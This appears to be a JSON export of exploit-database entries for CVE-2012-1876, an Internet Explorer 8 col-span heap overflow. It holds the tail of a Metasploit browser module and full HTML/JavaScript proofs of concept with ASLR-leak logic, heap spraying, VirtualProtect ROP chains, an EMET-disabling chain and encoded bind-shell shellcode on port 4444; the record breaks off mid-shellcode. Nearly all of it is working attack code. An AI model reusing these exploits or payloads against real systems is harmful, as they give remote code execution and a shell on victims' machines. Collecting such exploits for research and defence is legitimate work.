retn\r\n\t\t\t\t\t\t0x77c11120, # <- *&VirtualProtect()\r\n\t\t\t\t\t\t0x77c2e493, # mov eax, dword ptr ds:[eax]; pop ebp; retn\r\n\t\t\t\t\t\tjunk,\r\n\t\t\t\t\t\t0x77c2dd6c,\r\n\t\t\t\t\t\t0x77c4ec00, # pop ebp; retn\r\n\t\t\t\t\t\t0x77c35459, # ptr to 'push esp; ret'\r\n\t\t\t\t\t\t0x77c47705, # pop ebx; retn\r\n\t\t\t\t\t\texec_size, # ebx\r\n\t\t\t\t\t\t0x77c3ea01, # pop ecx; retn\r\n\t\t\t\t\t\t0x77c5d000, # W pointer (lpOldProtect) (-> ecx)\r\n\t\t\t\t\t\t0x77c46100, # pop edi; retn\r\n\t\t\t\t\t\t0x77c46101, # rop nop (-> edi)\r\n\t\t\t\t\t\t0x77c4d680, # pop edx; retn\r\n\t\t\t\t\t\t0x00000040, # newProtect (0x40) (-> edx)\r\n\t\t\t\t\t\t0x77c4e392, # pop eax; retn\r\n\t\t\t\t\t\tnop, # nops (-> eax)\r\n\t\t\t\t\t\t0x77c12df9 # pushad; retn\r\n\t\t\t\t\t].pack("V*")\r\n\t\t\twhen :jre\r\n\t\t\t\tprint_status("Using JRE ROP")\r\n\t\t\t\texec_size = code.length\r\n\t\t\t\trop =\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t0x7c346c0b, # retn\r\n\t\t\t\t\t\t0x7c36f970, # pop ebp; retn\r\n\t\t\t\t\t\t0x7c348b05, # xchg eax,esp; retn (pivot)\r\n\t\t\t\t\t\t0x7c36f970, # pop ebp; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c36f970, # skip 4 bytes [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c34373a, # pop ebx ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\texec_size, # ebx\r\n\t\t\t\t\t\t0x7c3444d0, # pop edx ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x00000040, # 0x00000040-> edx\r\n\t\t\t\t\t\t0x7c361829, # pop ecx ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c38f036, # &Writable location [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c342766, # pop edi ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c346c0b, # retn (rop nop) [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c350564, # pop esi ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c3415a2, # jmp [eax] [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c3766ff, # pop eax ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c37a151, # ptr to &VirtualProtect() - 0x0ef [IAT msvcr71.dll]\r\n\t\t\t\t\t\t0x7c378c81, # pushad # add al,0ef ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c345c30 # ptr to 'push esp; ret ' [MSVCR71.dll]\r\n\t\t\t\t\t].pack("V*")\r\n\t\tend\r\n\r\n\t\tcode = rop + code\r\n\t\treturn code\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tagent = request.headers['User-Agent']\r\n\t\tmy_target = get_target(agent)\r\n\r\n\t\t# Avoid the attack if the victim doesn't have the same setup we're targeting\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error("Browser not supported: #{agent}")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tjs_code = Rex::Text.to_unescape(get_payload(my_target), Rex::Arch.endian(target.arch))\r\n\r\n\t\ttable_builder = ''\r\n\r\n\t\t0.upto(132) do |i|\r\n\t\t\ttable_builder << "<table style=\\"table-layout:fixed\\" ><col id=\\"#{i}\\" width=\\"41\\" span=\\"9\\" >  </col></table>"\r\n\t\tend\r\n\r\n\t\t# About smash_vtable():\r\n\t\t# * smash the vftable 0x07070024\r\n\t\t# * span => the amount to overwrite\r\n\t\tjs_element_id = Rex::Text.rand_text_alpha(4)\r\n\t\tspray_trigger_js = <<-JS\r\n\r\n\t\tvar dap = "EEEE";\r\n\t\twhile ( dap.length < 480 ) dap += dap;\r\n\r\n\t\tvar padding = "AAAA";\r\n\t\twhile ( padding.length < 480 ) padding += padding;\r\n\r\n\t\tvar filler = "BBBB";\r\n\t\twhile ( filler.length < 480 ) filler += filler;\r\n\r\n\t\tvar arr = new Array();\r\n\t\tvar rra = new Array();\r\n\r\n\t\tvar div_container = document.getElementById("#{js_element_id}");\r\n\t\tdiv_container.style.cssText = "display:none";\r\n\r\n\t\tfor (var i=0; i < 500; i+=2) {\r\n\t\t\trra[i] = dap.substring(0, (0x100-6)/2);\r\n\t\t\tarr[i] = padding.substring(0, (0x100-6)/2);\r\n\t\t\tarr[i+1] = filler.substring(0, (0x100-6)/2);\r\n\t\t\tvar obj = document.createElement("button");\r\n\t\t\tdiv_container.appendChild(obj);\r\n\t\t}\r\n\r\n\t\tfor (var i=200; i<500; i+=2 ) {\r\n\t\t\trra[i] = null;\r\n\t\t\tCollectGarbage();\r\n\t\t}\r\n\r\n\t\tfunction heap_spray(){\r\n\t\t\tCollectGarbage();\r\n\r\n\t\t\tvar shellcode = unescape("#{js_code}");\r\n\r\n\t\t\twhile (shellcode.length < 100000)\r\n\t\t\tshellcode = shellcode + shellcode;\r\n\t\t\tvar onemeg = shellcode.substr(0, 64*1024/2);\r\n\t\t\tfor (i=0; i<14; i++) {\r\n\t\t\t\tonemeg += shellcode.substr(0, 64*1024/2);\r\n\t\t\t}\r\n\r\n\t\t\tonemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n\t\t\tvar spray = new Array();\r\n\r\n\t\t\tfor (i=0; i<400; i++) {\r\n\t\t\t\tspray[i] = onemeg.substr(0, onemeg.length);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tfunction smash_vtable(){\r\n\t\t\tvar obj_col_0 = document.getElementById("132");\r\n\t\t\tobj_col_0.width = "1178993";\r\n\t\t\tobj_col_0.span = "44";\r\n\t\t}\r\n\r\n\t\tsetTimeout(function(){heap_spray()}, 400);\r\n\t\tsetTimeout(function(){smash_vtable()}, 700);\r\n\t\tJS\r\n\r\n\t\tif datastore['OBFUSCATE']\r\n\t\t\tspray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js)\r\n\t\t\tspray_trigger_js.obfuscate\r\n\t\tend\r\n\r\n\t\t# build html\r\n\t\tcontent = <<-HTML\r\n\t\t<html>\r\n\t\t<body>\r\n\t\t<div id="#{js_element_id}"></div>\r\n\t\t#{table_builder}\r\n\t\t<script language='javascript'>\r\n\t\t#{spray_trigger_js}\r\n\t\t</script>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\tHTML\r\n\r\n\t\tprint_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\tend\r\n\r\nend\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-74062"}, {"lastseen": "2017-11-19T17:58:26", "description": "No description provided by source.", "published": "2013-01-10T00:00:00", "title": "Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2013-01-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60566", "id": "SSV:60566", "sourceData": "\n <!--\r\n** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass\r\n** Author: sickness@offsec.com\r\n** Thanks to Ryujin and Dookie for their help.\r\n \r\n####################################################################\r\n \r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb\r\n** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514\r\n \r\n####################################################################\r\n \r\n** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak :)\r\n** To get it working on a different version of Windows you will require to make your own chances to the exploit :)\r\n** Have fun :)\r\n-->\r\n \r\n<html>\r\n<body>\r\n<div id="evil"></div>\r\n<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>\r\n<script language='javascript'>\r\n \r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n \r\nvar free = "EEEE";\r\nwhile ( free.length < 500 ) free += free;\r\n \r\nvar string1 = "AAAA";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n \r\nvar string2 = "BBBB";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n \r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n \r\nvar div_container = document.getElementById("evil");\r\ndiv_container.style.cssText = "display:none";\r\n \r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement("button");\r\n div_container.appendChild(obj);\r\n}\r\n \r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n \r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n \r\n \r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n \r\n var shellcode = unescape("%u"+rop1+"%u"+rop2); // RET\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP\r\n shellcode+= unescape("%u1024%u0000"); // Size 0x00001024\r\n shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX\r\n shellcode+= unescape("%u0040%u0000"); // 0x00000040\r\n shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX\r\n shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location\r\n shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI\r\n shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX\r\n shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX\r\n shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD\r\n shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP\r\n shellcode+= unescape("%u9090%u9090"); // crap\r\n shellcode+= unescape("%u9090%u9090"); // crap\r\n \r\n // Bind shellcode on 4444 :)\r\n shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +\r\n "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +\r\n "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +\r\n "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +\r\n "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +\r\n "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +\r\n "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +\r\n "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +\r\n "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +\r\n "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +\r\n "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +\r\n "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +\r\n "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +\r\n "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +\r\n "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +\r\n "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +\r\n "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +\r\n "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +\r\n "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +\r\n "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +\r\n "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +\r\n "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +\r\n "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +\r\n "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +\r\n "%u006a%uff53%u41d5");\r\n \r\n \r\n \r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n \r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n \r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n \r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n \r\n var spray = new Array();\r\n \r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n \r\nfunction leak(){\r\n var leak_col = document.getElementById("132");\r\n leak_col.width = "41";\r\n leak_col.span = "19";\r\n}\r\n \r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n setTimeout(function(){heapspray(str_addr)}, 200); \r\n}\r\n \r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById("132");\r\n evil_col.width = "1178993";\r\n evil_col.span = "44";\r\n}\r\n \r\nsetTimeout(function(){leak()}, 300);\r\nsetTimeout(function(){get_leak()},700);\r\n//setTimeout(function(){heapspray()}, 900);\r\nsetTimeout(function(){trigger_overflow()}, 1200);\r\n \r\n</script>\r\n</body>\r\n</html>\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-60566"}, {"lastseen": "2017-11-19T13:21:35", "description": "No description provided by source.", "published": "2014-07-02T00:00:00", "type": "seebug", "title": "Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-07-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87111", "id": "SSV:87111", "sourceData": "\n <!--\r\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass\r\n** Offensive Security Research Team\r\n** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet\r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X\r\n-->\r\n \r\n<html>\r\n<body>\r\n<div id="evil"></div>\r\n<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>\r\n<script language='javascript'>\r\n \r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n \r\nvar free = "EEEE";\r\nwhile ( free.length < 500 ) free += free;\r\n \r\nvar string1 = "AAAA";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n \r\nvar string2 = "BBBB";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n \r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n \r\nvar div_container = document.getElementById("evil");\r\ndiv_container.style.cssText = "display:none";\r\n \r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement("button");\r\n div_container.appendChild(obj);\r\n}\r\n \r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n \r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n \r\n \r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n \r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n \r\n var getprocaddr = cbuttonlayout + 4836; // GetProcAddress\r\n var getprocaddr = getprocaddr.toString(16);\r\n var getprocaddr1 = getprocaddr.substring(4,8);\r\n var getprocaddr2 = getprocaddr.substring(0,4); // } RET\r\n \r\n var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING\r\n shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING\r\n shellcode+= unescape("%u4141%u4141"); // PADDING\r\n \r\n shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN\r\n shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN\r\n \r\n // EMET disable part 0x01\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN\r\n shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW\r\n shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u101C%u076d"); // EMET string\r\n shellcode+= unescape("%ue220%u0007"); // EMET offset\r\n shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u0000%u0000"); // Zero out ECX\r\n shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n shellcode+= unescape("%u"+rop37+"%u"+rop38); // ADD ESP,0C # RETN\r\n shellcode+= "EMET"; // EMET string\r\n shellcode+= unescape("%u0000%u0000"); // EMET string\r\n // EMET disable part 0x01 end\r\n \r\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP\r\n shellcode+= unescape("%u1024%u0000"); // Size 0x00001024\r\n shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX\r\n shellcode+= unescape("%u0040%u0000"); // 0x00000040\r\n shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX\r\n shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location\r\n shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI\r\n shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX\r\n shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX\r\n shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD\r\n shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n \r\n // EMET disable part 0x02\r\n // Execute the Corbomite bluff to disarm EAF\r\n shellcode+= unescape("%uc0b8%u6d10");\r\n shellcode+= unescape("%u8b07%u8b00");\r\n shellcode+= unescape("%u6800%u10c8");\r\n shellcode+= unescape("%u076d%ud0ff");\r\n shellcode+= unescape("%ud468%u6d10");\r\n shellcode+= unescape("%u5007%uc4b8");\r\n shellcode+= unescape("%u6d10%u8b07");\r\n shellcode+= unescape("%u8b00%uff00");\r\n shellcode+= unescape("%u8bd0%u81f0");\r\n shellcode+= unescape("%uccec%u0002");\r\n shellcode+= unescape("%uc700%u2404");\r\n shellcode+= unescape("%u0010%u0001");\r\n shellcode+= unescape("%ufc8b%uccb9");\r\n shellcode+= unescape("%u0002%u8300");\r\n shellcode+= unescape("%u04c7%ue983");\r\n shellcode+= unescape("%u3304%uf3c0");\r\n shellcode+= unescape("%u54aa%ufe6a");\r\n shellcode+= unescape("%ud6ff%u9090");\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n shellcode+= unescape("%u9090%u29eb"); // NOPs\r\n shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW\r\n shellcode+= unescape("%u"+getprocaddr1+"%u"+getprocaddr2); // GetProcAddress\r\n shellcode+= "NTDLL";\r\n shellcode+= unescape("%u0000");\r\n shellcode+= unescape("%u744e%u6553"); // NtSetContextThread\r\n shellcode+= unescape("%u4374%u6e6f");\r\n shellcode+= unescape("%u6574%u7478");\r\n shellcode+= unescape("%u6854%u6572");\r\n shellcode+= unescape("%u6461%u0000");\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n // EMET disable part 0x02 end\r\n \r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n \r\n shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +\r\n "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +\r\n "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +\r\n "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +\r\n 